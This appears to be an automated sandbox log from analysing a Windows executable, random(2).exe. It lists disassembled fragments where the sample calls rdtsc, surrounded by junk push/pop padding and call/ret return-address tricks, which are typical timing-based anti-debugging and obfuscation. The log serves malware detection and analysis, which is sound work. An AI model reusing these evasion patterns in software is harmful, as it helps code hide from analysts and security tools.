Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5DF6AE second address: 5DF6B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5DF6B4 second address: 5DF6B9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5DF6B9 second address: 5DF6D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29453582DEh 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5DF6D4 second address: 5DF6E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2944535536h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F2944535536h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5A608B second address: 5A6098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnc 00007F29453582D6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5A6098 second address: 5A60A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F2944535536h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5A60A4 second address: 5A60C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5DEAE9 second address: 5DEAEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5DEAEE second address: 5DEB06 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F29453582E1h 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5DEB06 second address: 5DEB0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5DEC89 second address: 5DEC8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5DEC8D second address: 5DECA7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F2944535540h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5DEE4E second address: 5DEE5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 jno 00007F29453582D6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5DEE5F second address: 5DEE65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5DF3ED second address: 5DF3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5DF3F2 second address: 5DF40F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2944535547h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5DF40F second address: 5DF41E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F29453582D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E1830 second address: 5E183A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2944535536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E183A second address: 5E1857 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F29453582DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jo 00007F29453582D6h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E19C6 second address: 5E19CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E22F0 second address: 5E2356 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebx 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F29453582D8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 jl 00007F29453582E3h 0x0000002a pushad 0x0000002b jno 00007F29453582D6h 0x00000031 mov edi, 773FC64Fh 0x00000036 popad 0x00000037 nop 0x00000038 jmp 00007F29453582E2h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F29453582E5h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E2356 second address: 5E235B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E280D second address: 5E2811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E2811 second address: 5E281D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E281D second address: 5E2835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b nop 0x0000000c and esi, 291A9FCAh 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E2835 second address: 5E2839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E2D71 second address: 5E2D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E358A second address: 5E358E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E481C second address: 5E4822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E5203 second address: 5E5209 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E5209 second address: 5E5222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29453582E5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E529E second address: 5E52A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E52A2 second address: 5E52B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F29453582D6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E5B2E second address: 5E5B34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E5B34 second address: 5E5B38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E68AD second address: 5E68B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E6645 second address: 5E6649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E6649 second address: 5E664F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E7DAC second address: 5E7DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 jng 00007F29453582DCh 0x0000000c mov dword ptr [ebp+122D17A4h], ecx 0x00000012 push 00000000h 0x00000014 jmp 00007F29453582E6h 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D1A1Ch], ebx 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E7DE5 second address: 5E7DEB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E7DEB second address: 5E7E28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F29453582E9h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E9891 second address: 5E9895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E9895 second address: 5E989F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E989F second address: 5E98A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2944535536h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E98A9 second address: 5E98AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5EAE92 second address: 5EAE9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5ED0B1 second address: 5ED0B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5EE241 second address: 5EE245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5EF092 second address: 5EF0A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E7B60 second address: 5E7B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5E7B67 second address: 5E7B71 instructions: 0x00000000 rdtsc 0x00000002 je 00007F29453582DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5F01C2 second address: 5F01C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5EB02D second address: 5EB031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5EB031 second address: 5EB037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5EC14F second address: 5EC173 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F29453582DAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5EC173 second address: 5EC179 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5F42B6 second address: 5F42BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5F42BA second address: 5F42C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5F42C0 second address: 5F4331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F29453582D8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 or bx, CEE5h 0x00000029 push 00000000h 0x0000002b mov di, BF00h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007F29453582D8h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b mov ebx, dword ptr [ebp+122D377Eh] 0x00000051 push eax 0x00000052 pushad 0x00000053 pushad 0x00000054 pushad 0x00000055 popad 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5EE4A9 second address: 5EE4AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5EE4AD second address: 5EE4B7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F29453582D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5ED1FF second address: 5ED21B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535544h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5ED21B second address: 5ED21F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5F5142 second address: 5F515B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2944535545h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5F12CF second address: 5F12DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F29453582D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5F60F4 second address: 5F60F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5F60F8 second address: 5F6151 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F29453582D8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov bx, C51Ah 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007F29453582D8h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 xor dword ptr [ebp+122D31B8h], eax 0x0000004c cld 0x0000004d push eax 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 push edx 0x00000052 pop edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5F228E second address: 5F2298 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5F2298 second address: 5F22C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F29453582EFh 0x00000010 jmp 00007F29453582E9h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5F719E second address: 5F71A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5F71A3 second address: 5F71D6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F29453582E2h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jmp 00007F29453582E6h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5F52C4 second address: 5F52F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 jmp 00007F2944535546h 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5F53A4 second address: 5F53B2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29453582D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5F53B2 second address: 5F53B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5F53B6 second address: 5F53D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jnp 00007F29453582E4h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5F53D3 second address: 5F53D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5F623A second address: 5F62E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F29453582D6h 0x0000000a popad 0x0000000b jmp 00007F29453582DAh 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F29453582E0h 0x00000017 nop 0x00000018 push dword ptr fs:[00000000h] 0x0000001f mov edi, esi 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007F29453582D8h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 00000018h 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 mov dword ptr [ebp+122D1A1Ch], edi 0x00000048 mov dword ptr [ebp+122D1E41h], edx 0x0000004e mov eax, dword ptr [ebp+122D15DDh] 0x00000054 mov dword ptr [ebp+122D17B1h], edx 0x0000005a push FFFFFFFFh 0x0000005c push 00000000h 0x0000005e push esi 0x0000005f call 00007F29453582D8h 0x00000064 pop esi 0x00000065 mov dword ptr [esp+04h], esi 0x00000069 add dword ptr [esp+04h], 0000001Ah 0x00000071 inc esi 0x00000072 push esi 0x00000073 ret 0x00000074 pop esi 0x00000075 ret 0x00000076 or dword ptr [ebp+122DB460h], eax 0x0000007c nop 0x0000007d push eax 0x0000007e push edx 0x0000007f push eax 0x00000080 push edx 0x00000081 jmp 00007F29453582DCh 0x00000086 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5F62E5 second address: 5F62EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5F62EB second address: 5F6305 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F29453582DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F29453582D6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5F6305 second address: 5F6313 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2944535536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5FE7FB second address: 5FE807 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 5F359D second address: 5F35A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 604B96 second address: 604BA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F29453582D6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 604BA2 second address: 604BA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 604BA8 second address: 604BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F29453582DEh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 604BC3 second address: 604BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 604BC7 second address: 604C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582DAh 0x00000007 jmp 00007F29453582E9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007F29453582D8h 0x00000014 pushad 0x00000015 popad 0x00000016 jns 00007F29453582DCh 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 604D88 second address: 604D8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe	RDTSC instruction interceptor: First address: 604D8C second address: 604DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F29453582D6h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F29453582E2h 0x00000017 rdtsc
